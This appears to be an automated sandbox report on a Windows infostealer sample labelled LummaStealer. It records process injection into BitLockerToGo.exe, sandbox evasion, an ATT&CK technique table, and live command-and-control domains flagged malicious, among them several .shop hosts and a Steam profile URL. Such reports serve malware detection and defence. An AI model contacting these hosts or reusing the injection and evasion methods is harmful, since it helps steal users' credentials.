Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CFADC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CFCD80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CEEDAD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D19D50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D17D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CDAD20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 02CDEA20 appears 179 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 02CDC7A0 appears 52 times
Source: BW4pTs1x3V.exe | Static PE information: Number of sections : 12 > 10
Source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
Source: BW4pTs1x3V.exe, 00000000.00000000.1453505977.00007FF67DB85000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameComparisonP. vs BW4pTs1x3V.exe
Source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
Source: BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
Source: BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
Source: BW4pTs1x3V.exe | Binary or memory string: OriginalFilenameComparisonP. vs BW4pTs1x3V.exe
Source: 00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine | Classification label: mal93.troj.evad.winEXE@3/0@11/3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D0739F CoCreateInstance
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | File created: C:\Users\Public\Libraries\icikh.scif
Source: BW4pTs1x3V.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BW4pTs1x3V.exe | ReversingLabs: Detection: 60%
Source: BW4pTs1x3V.exe | String found in binary or memory: net/addrselect.go
Source: BW4pTs1x3V.exe | String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: BW4pTs1x3V.exe | String found in binary or memory: OTbwLFHsAx/load.go
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | File read: C:\Users\user\Desktop\BW4pTs1x3V.exe
Source: unknown | Process created: C:\Users\user\Desktop\BW4pTs1x3V.exe "C:\Users\user\Desktop\BW4pTs1x3V.exe"
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Section loaded: umpdc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
Source: BW4pTs1x3V.exe | Static PE information: certificate valid
Source: BW4pTs1x3V.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: BW4pTs1x3V.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: BW4pTs1x3V.exe | Static file information: File size 13565176 > 1048576
Source: BW4pTs1x3V.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x53e600
Source: BW4pTs1x3V.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x6e9200
Source: BW4pTs1x3V.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb | source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL | source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp
Source: BW4pTs1x3V.exe | Static PE information: section name: .xdata
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2020F pushad ; iretd 3_2_02D20212
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2022F pushad ; iretd 3_2_02D20232
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D200FB pushad ; iretd 3_2_02D200FE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20093 push edx; iretd 3_2_02D20096
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20097 push edi; iretd 3_2_02D2009E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20087 push eax; iretd 3_2_02D2008E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2008F push ecx; iretd 3_2_02D20092
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D200AB pushad ; iretd 3_2_02D200AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20073 push edx; iretd 3_2_02D20076
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20077 push edx; iretd 3_2_02D2007A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2006F push ecx; iretd 3_2_02D20072
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20193 push ecx; iretd 3_2_02D20196
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20197 push eax; iretd 3_2_02D2019A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2019B push edi; iretd 3_2_02D201A2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20183 push edx; iretd 3_2_02D20186
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D201BF pushad ; iretd 3_2_02D201C2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20177 push ecx; iretd 3_2_02D2017E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2017F push ecx; iretd 3_2_02D20182
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2016F pushad ; iretd 3_2_02D20172
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D20133 push edi; iretd 3_2_02D2013A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D206DF pushfd ; iretd 3_2_02D206E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D2253B push cs; retf 3_2_02D2254A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D228B3 push ss; ret 3_2_02D22921
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3836 | Thread sleep time: -30000s >= -30000s
Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: BW4pTs1x3V.exe, 00000000.00000002.1886477830.0000023FBB607000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D15AD0 LdrInitializeThunk

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CD0000 value starts with: 4D5A
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: reinforcenh.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: stogeneratmns.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: fragnantbui.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: drawzhotdog.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: vozmeatillu.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: offensivedzvju.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: ghostreedmnu.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: gutterydhowi.shop
Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: dividenntykw.shop
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CD0000
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A2C008
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Queries volume information: C:\Users\user\Desktop\BW4pTs1x3V.exe VolumeInformation
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Desktop\BW4pTs1x3V.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: BW4pTs1x3V.exe, type: SAMPLE
Source: Yara match | File source: 0.0.BW4pTs1x3V.exe.7ff67ce60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BW4pTs1x3V.exe.7ff67ce60000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BW4pTs1x3V.exe PID: 1668, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: BW4pTs1x3V.exe, type: SAMPLE
Source: Yara match | File source: 0.0.BW4pTs1x3V.exe.7ff67ce60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BW4pTs1x3V.exe.7ff67ce60000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BW4pTs1x3V.exe PID: 1668, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown in the report for that cell)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (311), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (1), Process Injection (311), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (1), Virtualization/Sandbox Evasion (1), System Information Discovery (12), System Network Configuration Discovery, Internet Connection Discovery, Wi-Fi Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Screen Capture (1), Archive Collected Data (1), Clipboard Data (2), Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Source | Detection | Scanner | Label | Link
BW4pTs1x3V.exe | 61% | ReversingLabs | Win64.Trojan.LummaStealer |

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://player.vimeo.com | 0% | URL Reputation | safe |
https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
https://www.gstatic.cn/recaptcha/ | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe |
http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | URL Reputation | safe |
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe |
http://www.certum.pl/CPS0 | 0% | URL Reputation | safe |
https://steam.tv/ | 0% | URL Reputation | safe |
https://steamcommunity.com/profiles/76561199724331900 | 100% | URL Reputation | malware |
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | URL Reputation | safe |
http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe |
https://lv.queniujq.cn | 0% | URL Reputation | safe |
https://steamcommunity.com/profiles/76561199724331900/inventory/ | 100% | URL Reputation | malware |
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe |
https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | URL Reputation | safe |
https://checkout.steampowered.com/ | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe |
https://store.steampowered.com/; | 0% | URL Reputation | safe |
https://store.steampowered.com/about/ | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | 0% | URL Reputation | safe |
https://help.steampowered.com/en/ | 0% | URL Reputation | safe |
https://store.steampowered.com/news/ | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/ | 0% | URL Reputation | safe |
http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | 0% | URL Reputation | safe |
https://recaptcha.net/recaptcha/; | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | URL Reputation | safe |
https://store.steampowered.com/stats/ | 0% | URL Reputation | safe |
https://medal.tv | 0% | URL Reputation | safe |
https://broadcast.st.dl.eccdnx.com | 0% | URL Reputation | safe |
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dividenntykw.shop | 172.67.188.210 | true | true | | unknown
steamcommunity.com | 104.102.49.254 | true | false | | unknown
gravvitywio.store | 172.67.209.193 | true | true | | unknown
fragnantbui.shop | unknown | unknown | true | | unknown
gutterydhowi.shop | unknown | unknown | true | | unknown
offensivedzvju.shop | unknown | unknown | true | | unknown
stogeneratmns.shop | unknown | unknown | true | | unknown
reinforcenh.shop | unknown | unknown | true | | unknown
drawzhotdog.shop | unknown | unknown | true | | unknown
ghostreedmnu.shop | unknown | unknown | true | | unknown
vozmeatillu.shop | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
reinforcenh.shop | true | | unknown
stogeneratmns.shop | true | | unknown
ghostreedmnu.shop | true | | unknown
https://dividenntykw.shop/api | true | | unknown
https://steamcommunity.com/profiles/76561199724331900 | true | URL Reputation: malware | unknown
fragnantbui.shop | true | | unknown
offensivedzvju.shop | true | | unknown
drawzhotdog.shop | true | | unknown
vozmeatillu.shop | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://player.vimeo.com | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.discordapp.com/icons/ | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://steamcommunity.com/?subsection=broadcasts | BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdn.discordapp.com/banners/ | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://cdn.discordapp.com/guilds/ | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://store.steampowered.com/subscriber_agreement/ | BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gstatic.cn/recaptcha/ | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v9/oauth2/ | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://discord.com/api/v9/gateway/bot | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://discord.com/api/v9/guilds/ | BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3 | BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.valvesoftware.com/legal.htm | BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&amp;l=e | BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
